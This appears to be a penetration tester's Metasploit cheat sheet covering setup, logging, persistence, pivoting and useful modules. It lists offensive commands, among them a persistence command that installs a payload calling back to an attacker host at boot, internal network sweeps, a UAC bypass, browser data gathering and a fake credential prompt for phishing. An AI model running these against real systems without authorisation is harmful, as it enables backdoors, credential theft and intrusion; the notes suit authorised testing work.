

---
title: Metasploit Framework
categories: [cheatsheets]
tags: [security, pentesting]
---

## Metasploit

1) Initialize Database

sh> service postgresql start
sh> msfdb init

2) Check Database Status:

msf> db_status

3) Update Metasploit:

sh> msfupdate

4) Logging in Metasploit

msf> set ConsoleLogging yes
msf> set SessionLogging yes   // for future sessions

msf> spool <FileName>       // save logged data into a file
msf> save                   // save settings

## Exploits/Payloads

1) Encode the different meterpreter stages:

msf> set EnableStageEncoding True

2) Autostart a script in a new meterpreter session

msf> set AutoRunScript post/windows/manage/migrate

-> or: some modules offer a PrependMigrate option instead

## Persistence

msf> run persistence -p <PORT> -r <RHOST> -X -U -P <PAYLOAD>
-X: start at system boot
-U: start at user login

Important:

  • Delete the persistent shell after finishing the job
  • A removal script is created when the persistence module is used

## Pivoting

1) Create a route through a session for pivoting

msf> route add <netaddr> <netmask> <sess-id>
msf> route add 10.10.10.0 255.255.255.0 1

2) Explore the routed network

2.a) ping_sweep (does not need a route)

msf> use post/multi/gather/ping_sweep
msf> set RHOSTS 10.10.10.1-255
msf> set SESSION 2
msf> run

2.b) arp_sweep

msf> use post/multi/gather/arp_sweep

2.c) portscans

msf> use auxiliary/scanner/portscan/tcp

## Interesting Modules

I) Exploitation

exploit/windows/local/bypassuac             // UAC bypass
exploit/windows/local/trusted_service_path  // Checks for unquoted service paths

II) Information Gathering

post/windows/gather/winenum                 // meterpreter> run winenum (-c: delete logs, -r: download registry, -m: run winenum in a separate session)
post/windows/enum_chrome                    // Get browser data from Chrome, Firefox, IE
post/windows/enum_firefox
post/windows/enum_ie
post/windows/gather/phish_windows_credentials  // PowerShell credential prompt for social engineering

III) Auxiliary

auxiliary/scanner/smb/smb_version
auxiliary/admin/smb/samba_symlink_traversal // follows symlinks (if the Samba config has "follow symlinks = yes")